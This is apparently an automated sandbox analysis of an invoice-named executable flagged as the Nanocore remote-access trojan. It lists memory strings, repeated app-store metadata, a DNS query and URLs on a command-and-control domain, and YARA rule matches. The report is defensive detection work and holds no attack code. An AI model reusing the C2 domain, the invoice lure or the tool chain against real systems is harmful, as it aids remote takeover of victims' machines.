900.70_neutral_~_ytsefhwckbdv6","PackageId":"79986a28-1780-2990-8357-26989e97befa-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
Source: svchost.exe, 0000000D.00000003.780111212.0000026432D6A000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":426163994,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6","PackageId":"79986a28-1780-2990-8357-26989e97befa-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
Source: svchost.exe, 0000000D.00000003.780111212.0000026432D6A000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":426163994,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6","PackageId":"79986a28-1780-2990-8357-26989e97befa-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.39.3900.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
Source: svchost.exe, 0000000D.00000003.780227068.0000026432D8B000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 0000000D.00000003.780227068.0000026432D8B000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 0000000D.00000003.780227068.0000026432D8B000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName

Source: unknown

DNS traffic detected: queries for: coroloboxorozor.com

Source: svchost.exe, 0000000D.00000003.793408249.0000026432D21000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.815025294.0000000002B11000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.928658113.0000000002B91000.00000004.00000001.sdmp, svchost.exe, 0000001A.00000002.939330747.000000000304E000.00000004.00000001.sdmp	String found in binary or memory: http://coroloboxorozor.com
Source: svchost.exe, 0000001A.00000002.937000226.0000000002FE1000.00000004.00000001.sdmp	String found in binary or memory: http://coroloboxorozor.com/base/563CB4793425B369FD0FAF05E615CF43
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.815025294.0000000002B11000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.928658113.0000000002B91000.00000004.00000001.sdmp, svchost.exe, 0000001A.00000002.937000226.0000000002FE1000.00000004.00000001.sdmp	String found in binary or memory: http://coroloboxorozor.com/base/6A5D4D8EB90B8B0F2BFECECFD3E55241.html
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.815025294.0000000002B11000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.928658113.0000000002B91000.00000004.00000001.sdmp, svchost.exe, 0000001A.00000002.937000226.0000000002FE1000.00000004.00000001.sdmp	String found in binary or memory: http://coroloboxorozor.com/base/EE6EDC43DDDD18D0313D668388B5ECD3.html
Source: powershell.exe, 0000000F.00000002.922230907.0000000000A05000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: svchost.exe, 0000000D.00000003.793408249.0000026432D21000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: svchost.exe, 0000000D.00000003.793408249.0000026432D21000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: svchost.exe, 0000000D.00000003.793408249.0000026432D21000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 0000000F.00000002.941376241.00000000046E2000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.815025294.0000000002B11000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.939999983.00000000045A1000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.928658113.0000000002B91000.00000004.00000001.sdmp, svchost.exe, 0000001A.00000002.937000226.0000000002FE1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.941376241.00000000046E2000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: svchost.exe, 0000000D.00000003.780111212.0000026432D6A000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.780227068.0000026432D8B000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 0000000D.00000003.780111212.0000026432D6A000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.780227068.0000026432D8B000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/termsofservice
Source: svchost.exe, 0000000D.00000003.777811581.0000026432D57000.00000004.00000001.sdmp	String found in binary or memory: http://www.hulu.com/privacy
Source: svchost.exe, 0000000D.00000003.777811581.0000026432D57000.00000004.00000001.sdmp	String found in binary or memory: http://www.hulu.com/terms
Source: AdvancedRun.exe, AdvancedRun.exe, 0000000B.00000000.764051839.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	String found in binary or memory: http://www.nirsoft.net/
Source: svchost.exe, 0000000D.00000003.794313140.0000026432DB6000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.793944575.0000026432D83000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 0000000D.00000003.794313140.0000026432DB6000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.793944575.0000026432D83000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 0000000D.00000003.794313140.0000026432DB6000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.793944575.0000026432D83000.00000004.00000001.sdmp	String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: powershell.exe, 00000008.00000003.848557817.0000000005ADE000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: svchost.exe, 0000000D.00000003.780111212.0000026432D6A000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.780227068.0000026432D8B000.00000004.00000001.sdmp	String found in binary or memory: https://instagram.com/hiddencity_
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	String found in binary or memory: https://sectigo.com/CPS0C
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0D
Source: svchost.exe, 0000000D.00000003.777811581.0000026432D57000.00000004.00000001.sdmp	String found in binary or memory: https://www.hulu.com/ca-privacy-rights
Source: svchost.exe, 0000000D.00000003.777811581.0000026432D57000.00000004.00000001.sdmp	String found in binary or memory: https://www.hulu.com/do-not-sell-my-info
Source: svchost.exe, 0000000D.00000003.794313140.0000026432DB6000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.793944575.0000026432D83000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 0000000D.00000003.794313140.0000026432DB6000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.793944575.0000026432D83000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/info/privacy

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000016.00000002.954773732.0000000003D76000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287989.exe PID: 7164, type: MEMORY
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3da9c08.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3d76de8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3da9c08.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.3d76de8.5.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000016.00000002.954773732.0000000003D76000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000016.00000002.954773732.0000000003D76000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287989.exe PID: 7164, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287989.exe PID: 7164, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 22.2.svchost.exe.3da9c08.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.svchost.exe.3da9c08.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 22.2.svchost.exe.3d76de8.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.svchost.exe.3d76de8.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
